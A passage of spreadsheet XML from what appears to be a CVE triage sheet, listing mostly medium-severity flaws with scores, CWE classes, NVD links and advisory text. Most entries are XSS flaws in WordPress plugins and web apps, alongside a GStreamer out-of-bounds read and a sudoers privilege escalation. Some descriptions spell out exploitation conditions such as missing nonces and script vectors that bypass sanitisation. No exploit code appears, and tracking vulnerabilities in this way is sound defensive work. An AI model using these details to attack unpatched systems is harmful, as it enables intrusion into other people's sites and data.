      <c r="L4339" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GStreamer gst-plugins-good (avidemux). In gst_avi_demux_riff_parse_vprp(), the number of available gst_riff_vprp_video_field_desc entries is calculated by dividing the remaining buffer size by the attacker-controlled vprp-&gt;fields value, rather than by sizeof(gst_riff_vprp_video_field_desc). This can cause the parser to treat more field descriptors as available than fit in the input buffer, resulting in out-of-bounds reads. Processing a crafted AVI via playbin/decodebin can crash the application (denial of service). Fixed upstream in gst-plugins-good 1.28.6 (GStreamer-SA-2026-0072).</t>
        </is>
      </c>
      <c r="M4339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73434</t>
        </is>
      </c>
    </row>
    <row r="4340">
      <c r="A4340" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73506</t>
        </is>
      </c>
      <c r="C4340" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4340" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4340" s="5" t="inlineStr"/>
      <c r="F4340" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4340" s="5" t="inlineStr"/>
      <c r="H4340" s="5" t="inlineStr"/>
      <c r="I4340" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J4340" s="5" t="inlineStr"/>
      <c r="K4340" s="5" t="inlineStr">
        <is>
          <t>CWE-150</t>
        </is>
      </c>
      <c r="L4340" s="5" t="inlineStr">
        <is>
          <t>Oh My Posh is the most customisable and low-latency cross platform/shell prompt renderer. Prior to 29.35.1, write(s rune) in src/terminal/writer.go emitted attacker-controlled current directory names and Git metadata, including Commit.Subject, Commit.Author.Name, Commit.Author.Email, and RawUpstreamURL, without removing C0/C1 terminal control characters such as ESC, BEL, CSI, and OSC, allowing terminal escape sequence injection during prompt rendering that could overwrite the clipboard, spoof the prompt or screen, manipulate the window title, or disrupt the terminal. This issue is fixed in version 29.35.1.</t>
        </is>
      </c>
      <c r="M4340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73506</t>
        </is>
      </c>
    </row>
    <row r="4341">
      <c r="A4341" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75170</t>
        </is>
      </c>
      <c r="C4341" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4341" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4341" s="5" t="inlineStr"/>
      <c r="F4341" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4341" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4341" s="5" t="inlineStr"/>
      <c r="I4341" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4341" s="5" t="inlineStr"/>
      <c r="K4341" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4341" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting (XSS) vulnerability in the /loginController/doLogin endpoint of the HubCore platform (version 14.1.1) allows a remote unauthenticated attacker to inject arbitrary JavaScript into the application's response via the language POST parameter.</t>
        </is>
      </c>
      <c r="M4341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75170</t>
        </is>
      </c>
    </row>
    <row r="4342">
      <c r="A4342" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75307</t>
        </is>
      </c>
      <c r="C4342" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4342" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4342" s="5" t="inlineStr"/>
      <c r="F4342" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4342" s="5" t="inlineStr"/>
      <c r="H4342" s="5" t="inlineStr"/>
      <c r="I4342" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4342" s="5" t="inlineStr"/>
      <c r="K4342" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4342" s="5" t="inlineStr">
        <is>
          <t>zhitan-ems 1.0.0 is vulnerable to Cross Site Scripting (XSS) via SVG file upload through the /equipmentFile/upload endpoint.</t>
        </is>
      </c>
      <c r="M4342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75307</t>
        </is>
      </c>
    </row>
    <row r="4343">
      <c r="A4343" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75586</t>
        </is>
      </c>
      <c r="C4343" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4343" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4343" s="5" t="inlineStr"/>
      <c r="F4343" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4343" s="5" t="inlineStr"/>
      <c r="H4343" s="5" t="inlineStr"/>
      <c r="I4343" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4343" s="5" t="inlineStr"/>
      <c r="K4343" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4343" s="5" t="inlineStr">
        <is>
          <t>The Unlimited Elements For Elementor plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via 'formData[id]' Parameter in all versions up to, and including, 2.0.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. The front-end AJAX handler is registered on the public 'wp' action with no nonce, capability, or referer check, and the raw attacker-controlled id value is interpolated verbatim into an exception message that is echoed back without escaping; when the response is served as text/html rather than application/json, the browser parses the injected markup.</t>
        </is>
      </c>
      <c r="M4343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75586</t>
        </is>
      </c>
    </row>
    <row r="4344">
      <c r="A4344" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76002</t>
        </is>
      </c>
      <c r="C4344" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4344" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4344" s="5" t="inlineStr"/>
      <c r="F4344" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4344" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4344" s="5" t="inlineStr"/>
      <c r="I4344" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4344" s="5" t="inlineStr"/>
      <c r="K4344" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4344" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. Scope is changed.</t>
        </is>
      </c>
      <c r="M4344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76002</t>
        </is>
      </c>
    </row>
    <row r="4345">
      <c r="A4345" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77150</t>
        </is>
      </c>
      <c r="C4345" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4345" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4345" s="5" t="inlineStr"/>
      <c r="F4345" s="5" t="inlineStr"/>
      <c r="G4345" s="5" t="inlineStr"/>
      <c r="H4345" s="5" t="inlineStr"/>
      <c r="I4345" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4345" s="5" t="inlineStr"/>
      <c r="K4345" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4345" s="5" t="inlineStr">
        <is>
          <t>The Unlimited Elements For Elementor plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via 'data[name]' Parameter in all versions up to, and including, 2.0.16 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. The show_preview AJAX action is registered for unauthenticated users and is gated only by a nonce, which an unauthenticated attacker can retrieve by loading any publicly accessible page that emits it.</t>
        </is>
      </c>
      <c r="M4345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77150</t>
        </is>
      </c>
    </row>
    <row r="4346">
      <c r="A4346" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77654</t>
        </is>
      </c>
      <c r="C4346" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4346" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4346" s="5" t="inlineStr"/>
      <c r="F4346" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4346" s="5" t="inlineStr"/>
      <c r="H4346" s="5" t="inlineStr"/>
      <c r="I4346" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4346" s="5" t="inlineStr"/>
      <c r="K4346" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L4346" s="5" t="inlineStr">
        <is>
          <t>Improper Privilege Management vulnerability in Horizon Security Analyzer (formerly AlgoSec Firewall Analyzer) on Linux, 64 bit allows Privilege Escalation and Parameter Injection.
A local user with access to the command line may escalate their privileges by abusing the parameters of a command that is approved in the sudoers file. 
This issue affects Horizon Security Analyzer : A33.10, A33.20 and A33.30.</t>
        </is>
      </c>
      <c r="M4346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77654</t>
        </is>
      </c>
    </row>
    <row r="4347">
      <c r="A4347" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77818</t>
        </is>
      </c>
      <c r="C4347" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4347" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4347" s="5" t="inlineStr"/>
      <c r="F4347" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4347" s="5" t="inlineStr"/>
      <c r="H4347" s="5" t="inlineStr"/>
      <c r="I4347" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4347" s="5" t="inlineStr"/>
      <c r="K4347" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4347" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc. Library Information and Document Automation Program allows Content Spoofing.
This issue affects Library Information and Document Automation Program: from v22.1 before v22.2.</t>
        </is>
      </c>
      <c r="M4347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77818</t>
        </is>
      </c>
    </row>
    <row r="4348">
      <c r="A4348" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7804</t>
        </is>
      </c>
      <c r="C4348" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4348" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4348" s="5" t="inlineStr"/>
      <c r="F4348" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4348" s="5" t="inlineStr"/>
      <c r="H4348" s="5" t="inlineStr"/>
      <c r="I4348" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4348" s="5" t="inlineStr"/>
      <c r="K4348" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4348" s="5" t="inlineStr">
        <is>
          <t>The Product Filter for WooCommerce by WBW plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wpf_fid' parameter in all versions up to, and including, 3.4.2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the crafted request to target a page where a filter using the vulnerable recalculation output is present.</t>
        </is>
      </c>
      <c r="M4348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7804</t>
        </is>
      </c>
    </row>
    <row r="4349">
      <c r="A4349" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78172</t>
        </is>
      </c>
      <c r="C4349" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4349" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4349" s="5" t="inlineStr"/>
      <c r="F4349" s="5" t="inlineStr"/>
      <c r="G4349" s="5" t="inlineStr"/>
      <c r="H4349" s="5" t="inlineStr"/>
      <c r="I4349" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4349" s="5" t="inlineStr"/>
      <c r="K4349" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4349" s="5" t="inlineStr">
        <is>
          <t>The Themify – WooCommerce Product Filter plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via Query Parameter Name in all versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.</t>
        </is>
      </c>
      <c r="M4349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78172</t>
        </is>
      </c>
    </row>
    <row r="4350">
      <c r="A4350" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78377</t>
        </is>
      </c>
      <c r="C4350" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4350" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4350" s="5" t="inlineStr"/>
      <c r="F4350" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4350" s="5" t="inlineStr"/>
      <c r="H4350" s="5" t="inlineStr"/>
      <c r="I4350" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4350" s="5" t="inlineStr"/>
      <c r="K4350" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L4350" s="5" t="inlineStr">
        <is>
          <t>URL redirection to untrusted site ('open redirect') vulnerability in Yordam Informatics Technology Consulting, Training, and Electronic Systems Industry and Trade Inc. Library Information and Document Automation Program allows Phishing.
This issue affects Library Information and Document Automation Program: from v22.1 before v22.2.</t>
        </is>
      </c>
      <c r="M4350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78377</t>
        </is>
      </c>
    </row>
    <row r="4351">
      <c r="A4351" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78738</t>
        </is>
      </c>
      <c r="C4351" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4351" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4351" s="5" t="inlineStr"/>
      <c r="F4351" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4351" s="5" t="inlineStr"/>
      <c r="H4351" s="5" t="inlineStr"/>
      <c r="I4351" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4351" s="5" t="inlineStr"/>
      <c r="K4351" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4351" s="5" t="inlineStr">
        <is>
          <t>Silverpeas Core 6.4.6 is vulnerable to Cross Site Scripting (XSS) via the Document management file upload feature.</t>
        </is>
      </c>
      <c r="M4351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78738</t>
        </is>
      </c>
    </row>
    <row r="4352">
      <c r="A4352" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78741</t>
        </is>
      </c>
      <c r="C4352" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4352" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4352" s="5" t="inlineStr"/>
      <c r="F4352" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4352" s="5" t="inlineStr"/>
      <c r="H4352" s="5" t="inlineStr"/>
      <c r="I4352" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4352" s="5" t="inlineStr"/>
      <c r="K4352" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4352" s="5" t="inlineStr">
        <is>
          <t>Silverpeas Core &lt;=6.4.6 is vulnerable to Cross Site Scripting (XSS) in the wysiwyg-CKEditor image upload feature.</t>
        </is>
      </c>
      <c r="M4352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78741</t>
        </is>
      </c>
    </row>
    <row r="4353">
      <c r="A4353" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78742</t>
        </is>
      </c>
      <c r="C4353" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4353" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4353" s="5" t="inlineStr"/>
      <c r="F4353" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4353" s="5" t="inlineStr"/>
      <c r="H4353" s="5" t="inlineStr"/>
      <c r="I4353" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4353" s="5" t="inlineStr"/>
      <c r="K4353" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4353" s="5" t="inlineStr">
        <is>
          <t>Silverpeas Core &lt;=6.4.6 is vulnerable to Cross Site Scripting (XSS) via the Multimedia library application introduction.</t>
        </is>
      </c>
      <c r="M4353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78742</t>
        </is>
      </c>
    </row>
    <row r="4354">
      <c r="A4354" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79419</t>
        </is>
      </c>
      <c r="C4354" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4354" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4354" s="5" t="inlineStr"/>
      <c r="F4354" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4354" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4354" s="5" t="inlineStr"/>
      <c r="I4354" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4354" s="5" t="inlineStr"/>
      <c r="K4354" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4354" s="5" t="inlineStr">
        <is>
          <t>A reflected cross-site scripting (XSS) vulnerability exists in EMX Tecnologia Gestao X Business Suite 8.4 and earlier. The vulnerability is caused by insufficient validation and sanitization of the mensagem parameter in the /Configuracao/Imagens.aspx endpoint, allowing an authenticated attacker to inject arbitrary JavaScript code that is reflected and executed in the context of a victim's browser.</t>
        </is>
      </c>
      <c r="M4354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79419</t>
        </is>
      </c>
    </row>
    <row r="4355">
      <c r="A4355" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80180</t>
        </is>
      </c>
      <c r="C4355" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4355" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4355" s="5" t="inlineStr"/>
      <c r="F4355" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4355" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H4355" s="5" t="inlineStr"/>
      <c r="I4355" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4355" s="5" t="inlineStr"/>
      <c r="K4355" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4355" s="5" t="inlineStr">
        <is>
          <t>Stored XSS via markdown HTML processing in Apache Allura.
This issue affects Apache Allura: from through 1.20.0.
Users are recommended to upgrade to version 1.21.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M4355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80180</t>
        </is>
      </c>
    </row>
    <row r="4356">
      <c r="A4356" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80190</t>
        </is>
      </c>
      <c r="C4356" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4356" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4356" s="5" t="inlineStr"/>
      <c r="F4356" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4356" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H4356" s="5" t="inlineStr"/>
      <c r="I4356" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4356" s="5" t="inlineStr"/>
      <c r="K4356" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4356" s="5" t="inlineStr">
        <is>
          <t>Apache Allura: stored XSS via SVN code repositories.  Git repositories are not known to be affected.  The vulnerability is likely mitigated via default CSP headers.
This issue affects Apache Allura: through 1.20.0.
Users are recommended to upgrade to version 1.21.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M4356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80190</t>
        </is>
      </c>
    </row>
    <row r="4357">
      <c r="A4357" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84369</t>
        </is>
      </c>
      <c r="C4357" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4357" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4357" s="5" t="inlineStr"/>
      <c r="F4357" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4357" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H4357" s="5" t="inlineStr"/>
      <c r="I4357" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J4357" s="5" t="inlineStr"/>
      <c r="K4357" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4357" s="5" t="inlineStr">
        <is>
          <t>SVGO, short for SVG Optimizer, is a Node.js library and command-line application for optimizing SVG files. From version 1.0.0 until versions 2.8.4, 3.3.5, and 4.1.0, the opt-in removeScripts plugin, named removeScriptElement in versions 2 and 3 and implemented in plugins/removeScripts.js, removes SVG and XHTML script elements but does not inspect executable HTML content inside SVG foreignObject elements. Event-handler attributes such as onload and onbeforetoggle, srcdoc documents, and executable URLs in the action, data, formaction, href, and src attributes can remain in attacker-controlled SVG input. When an application uses the plugin as its only protection and serves the optimized SVG in an active browser context, the payload can execute script in the viewer's origin, expose data, modify content, or perform actions as the victim. This issue is fixed in versions 2.8.4, 3.3.5, and 4.1.0.</t>
        </is>
      </c>
      <c r="M4357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84369</t>
        </is>
      </c>
    </row>
    <row r="4358">
      <c r="A4358" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8447</t>
        </is>
      </c>
      <c r="C4358" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4358" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4358" s="5" t="inlineStr"/>
      <c r="F4358" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4358" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H4358" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I4358" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4358" s="5" t="inlineStr"/>
      <c r="K4358" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4358" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 suffer from a stored cross-site scripting vulnerability in the Playground chat interface.</t>
        </is>
      </c>
      <c r="M4358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8447</t>
        </is>
      </c>
    </row>
    <row r="4359">
      <c r="A4359" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84960</t>
        </is>
      </c>
      <c r="C4359" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4359" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4359" s="5" t="inlineStr"/>
      <c r="F4359" s="5" t="inlineStr"/>
      <c r="G4359" s="5" t="inlineStr"/>
      <c r="H4359" s="5" t="inlineStr"/>
      <c r="I4359" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4359" s="5" t="inlineStr"/>
      <c r="K4359" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4359" s="5" t="inlineStr">
        <is>
          <t>The WP-Members Membership Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via URL Query String in all versions up to, and including, 3.5.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Successful exploitation requires the victim to first visit the attacker-crafted URL and then click the Terms of Service link rendered on the resulting registration page.</t>
        </is>
      </c>
      <c r="M4359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84960</t>
        </is>
      </c>
    </row>
    <row r="4360">
      <c r="A4360" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85227</t>
        </is>
      </c>
      <c r="C4360" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4360" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4360" s="5" t="inlineStr"/>
      <c r="F4360" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4360" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4360" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I4360" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J4360" s="5" t="inlineStr"/>
      <c r="K4360" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4360" s="5" t="inlineStr">
        <is>
          <t>MISP contains a reflected Cross-Site Scripting (XSS) vulnerability in the event attribute filtering query builder. The taggedAttributes and galaxyAttachedAttributes URL parameters were inserted into the query-builder rules without HTML escaping before being serialized as JSON and embedded inside a &lt;script&gt; element.
